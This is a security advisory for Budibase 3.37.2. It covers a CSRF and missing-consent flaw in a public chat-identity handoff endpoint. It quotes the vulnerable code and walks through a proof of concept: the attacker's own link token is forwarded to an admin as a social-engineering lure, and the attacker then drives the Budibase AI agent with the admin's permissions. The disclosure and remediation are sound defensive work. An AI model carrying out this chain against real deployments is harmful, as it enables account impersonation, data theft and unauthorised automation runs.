Budibase has an Account Impersonation Issue — Chat Identity Link Hijacking via Missing Consent & CSRF

Description

## Title **Chat Identity Link Hijacking — Attacker Can Silently Map Their Slack/Discord Identity to Any Authenticated Budibase User's Account** ## Severity **High** — CVSS 3.1: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N = **7.3** ## Affected Product - **Product:** Budibase - **Version:** 3.37.2 (introduced in this version) - **Component:** `packages/server/src/api/controllers/ai/chatIdentityLinks.ts` - **Endpoint:** `GET /api/chat-links/:instance/:token/handoff` ## Vulnerability Type - CWE-352: Cross-Site Request Forgery - CWE-284: Improper Access Control --- ## Vulnerability Description `GET /api/chat-links/:instance/:token/handoff` is a **public endpoint** (no auth required) that performs a permanent, state-changing operation: it binds an external chat identity (Slack/Discord/MS Teams) to an authenticated Budibase user account, with **no consent UI and no CSRF protection**. The session token in the URL is created **by the attacker** (from their own `/link` slash command) and embeds **the attacker's `externalUserId`**. When an authenticated Budibase victim visits the URL, their account is silently and permanently linked to the attacker's Slack/Discord identity. The server responds with `"Authentication succeeded."` — no indication of what was linked. ### Route Registration ```typescript // packages/server/src/api/routes/chat.ts:22 router.get( "/api/chat-links/:instance/:token/handoff", controller.handoffChatLinkSession // registered in publicRoutes — zero auth middleware ) ``` ### Vulnerable Controller (full function) ```typescript // packages/server/src/api/controllers/ai/chatIdentityLinks.ts:61–110 export async function handoffChatLinkSession( ctx: UserCtx<void, string, { instance: string; token: string }> ) { const token = resolveToken(ctx.params.token) const session = await sdk.ai.chatIdentityLinks.getChatIdentityLinkSession(token) if (!session) { throw new HTTPError("Link token is invalid or has expired", 400) } assertSessionMatchesInstance({ workspaceId: session.workspaceId, instance: ctx.params.instance }) if (!ctx.isAuthenticated) { // Unauthenticated: set return URL cookie, redirect to login // After login, same URL is visited again → attack completes silently utils.setCookie(ctx, `/api/chat-links/${ctx.params.instance}/${token}/handoff`, "budibase:returnurl", { sign: false } // ← unsigned cookie, but not an open redirect ) ctx.redirect("/builder/auth/login") return } const currentGlobalUserId = getCurrentGlobalUserId(ctx) const consumedSession = await sdk.ai.chatIdentityLinks.consumeChatIdentityLinkSession(token) // ↓↓↓ THE VULNERABLE WRITE — no consent check, no CSRF token ↓↓↓ await sdk.ai.chatIdentityLinks.upsertChatIdentityLink({ provider: consumedSession.provider, externalUserId: consumedSession.externalUserId, // ← ATTACKER's Slack ID externalUserName: consumedSession.externalUserName, teamId: consumedSession.teamId, globalUserId: currentGlobalUserId, // ← VICTIM's Budibase user ID linkedBy: currentGlobalUserId, }) ctx.type = "text/html" ctx.body = renderLinkSuccessPage() // ← "Authentication succeeded." — no disclosure to user } ``` --- ## Proof of Concept — Annotated HTTP Trace ### Setup | Role | Identity | |---|---| | Attacker | Slack user `U_ATTACKER` (e.g. `UA12345678`), Budibase tenant `acme`, workspace ID `ws_abc123` | | Victim | Budibase admin, session cookie `budibase:session=VICTIM_SESSION` | --- ### Step 1 — Attacker triggers `/link` in Slack Attacker types `/link` to the Budibase Slack bot. Budibase server creates a Redis session: **Redis key:** `chatIdentityLinkSession:tok_xxxxxxxxxxxxxxxx` **Redis value (exact structure from `ChatIdentityLinkSession` interface):** ```json { "token": "tok_xxxxxxxxxxxxxxxx", "tenantId": "acme", "workspaceId": "ws_abc123", "provider": "slack", "externalUserId": "UA12345678", "externalUserName": "attacker", "teamId": "T_ACME_SLACK", "createdAt": "2026-05-02T10:00:00.000Z", "expiresAt": "2026-05-02T10:10:00.000Z" } ``` Slack DM sent privately to attacker: ``` Link your Slack account to continue chatting with this agent. https://budibase.company.com/api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff ``` **Key observation:** This URL embeds the attacker's own `externalUserId` inside the token. The attacker has full control over which identity gets linked. --- ### Step 2 — Attacker forwards URL to victim Attacker posts in the company Slack: ``` @admin please click this to connect your Budibase account for AI agent access: https://budibase.company.com/api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff ``` --- ### Step 3 — Victim clicks link (authenticated) **HTTP Request (victim's browser):** ```http GET /api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff HTTP/1.1 Host: budibase.company.com Cookie: budibase:session=VICTIM_SESSION ``` **HTTP Response:** ```http HTTP/1.1 200 OK Content-Type: text/html <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Authentication succeeded</title> </head> <body> <p>Authentication succeeded.</p> <script> if (window.opener && !window.opener.closed) { try { window.opener.focus(); window.close() } catch (error) {} } </script> </body> </html> ``` The victim sees "Authentication succeeded." with no mention of Slack, no mention of `attacker`, no mention of what capabilities were granted. **CouchDB global-db document written immediately after (exact structure from `upsertChatIdentityLink`):** ```json { "_id": "chatidentitylink_acme_slack_T_ACME_SLACK_UA12345678", "tenantId": "acme", "provider": "slack", "externalUserId": "UA12345678", "globalUserId": "ro_global_us_VICTIM_ADMIN_ID", "linkedAt": "2026-05-02T10:00:42.000Z", "linkedBy": "ro_global_us_VICTIM_ADMIN_ID", "externalUserName": "attacker", "teamId": "T_ACME_SLACK", "createdAt": "2026-05-02T10:00:42.000Z", "updatedAt": "2026-05-02T10:00:42.000Z" } ``` The mapping is now permanent. `externalUserId = UA12345678` (attacker) → `globalUserId = ro_global_us_VICTIM_ADMIN_ID` (victim). --- ### Step 4 — Attacker impersonates victim via AI agent Attacker sends any message to the Budibase Slack bot from their own account (`UA12345678`). The chat handler resolves the identity: ```typescript // packages/server/src/api/controllers/webhook/chatHandler.ts:421 const existingLink = await sdk.ai.chatIdentityLinks.getChatIdentityLink({ provider: AgentChannelProvider.SLACK, externalUserId: "UA12345678", // ← attacker's Slack ID teamId: "T_ACME_SLACK", }) // existingLink.globalUserId = "ro_global_us_VICTIM_ADMIN_ID" const linkedUser = await getGlobalUser("ro_global_us_VICTIM_ADMIN_ID") // All agent tool calls now execute with victim admin's permissions ``` The attacker can now ask the agent: > "Show me all rows in the Customers table" > "Trigger the 'Send Invoice' automation for customer ID 42" > "What files are in the knowledge base?" Each request runs with the victim admin's identity and permissions. The victim has no indication this is happening. --- ### Step 3b — Variant: Victim Not Yet Authenticated If the victim is not currently logged in when they click the URL: **HTTP Request:** ```http GET /api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff HTTP/1.1 Host: budibase.company.com ``` **HTTP Response:** ```http HTTP/1.1 302 Found Location: /builder/auth/login Set-Cookie: budibase:returnurl=%2Fapi%2Fchat-links%2Fws_abc123%2Ftok_xxxxxxxxxxxxxxxx%2Fhandoff; Path=/ ``` After the victim logs in, the browser follows the return URL and the attack completes identically to Step 3. --- ## Impact | Dimension | Detail | |---|---| | Confidentiality | **High** — attacker reads all table rows, files, and knowledge base data accessible to victim | | Integrity | **High** — attacker writes rows and triggers automations (email, external API calls, record creation) as victim | | Availability | None | | Auth required | **Low** — attacker only needs a Slack/Discord account in the same workspace as the Budibase bot | | User interaction | **Required** — victim clicks one link (trivial social engineering in any enterprise Slack) | | Scope | Unchanged — impact is within the victim's Budibase tenant | | Persistence | **Permanent** — the link document persists in CouchDB until explicitly deleted; re-exploitation survives token rotation | --- ## Why Severity Is High (Not Medium) The social engineering bar is near zero in enterprise Slack: - The link looks like a legitimate Budibase URL on the company domain - The message pattern ("link your account for AI agent access") matches the product's own UX - A victim who clicks and sees "Authentication succeeded." has no reason to be suspicious - The effect is **permanent and silent** — the victim never learns their account was linked Combined with admin-level access to all application data and automation triggers, this meets the bar for High. --- ## Remediation ### Minimum Fix — Add Consent Page Convert the handoff to a two-step flow: ``` GET /api/chat-links/:instance/:token/handoff → Show consent page: "You are linking your Budibase account to [externalUserName]'s Slack identity ([provider]). This allows them to interact with AI agents as you. [Confirm] [Cancel]" POST /api/chat-links/:instance/:token/handoff (with CSRF token) → Perform the upsertChatIdentityLink() write ``` Moving the write to `POST` removes it from `publicRoutes`, making Budibase's existing CSRF middleware apply automatically. ### Additional Hardening - Show the `externalUserName` and provider on the consent page - Log the event to the audit trail (both identities, timestamp, IP) - Optionally restrict linking to users with explicit permission (not all roles) --- Credits, Vishal Kumar B https://github.com/VishaaLlKumaaRr ## References - `packages/server/src/api/routes/chat.ts:22` — public route registration - `packages/server/src/api/controllers/ai/chatIdentityLinks.ts:61–110` — full vulnerable controller - `packages/server/src/sdk/workspace/ai/chatIdentityLinks.ts:135–165` — session creation (embeds attacker's externalUserId) - `packages/server/src/sdk/workspace/ai/chatIdentityLinks.ts:202–247` — upsertChatIdentityLink (permanent write) - `packages/server/src/api/controllers/webhook/chatHandler.ts:421` — identity resolution during agent message handling - `packages/server/src/ai/tools/budibase/automations.ts` — automation trigger capability - `packages/server/src/ai/tools/budibase/rows.ts` — row read/write capability - `packages/types/src/sdk/chatIdentityLinks.ts` — session + link type definitions - CWE-352: Cross-Site Request Forgery - CWE-284: Improper Access Control

Affected Packages (1)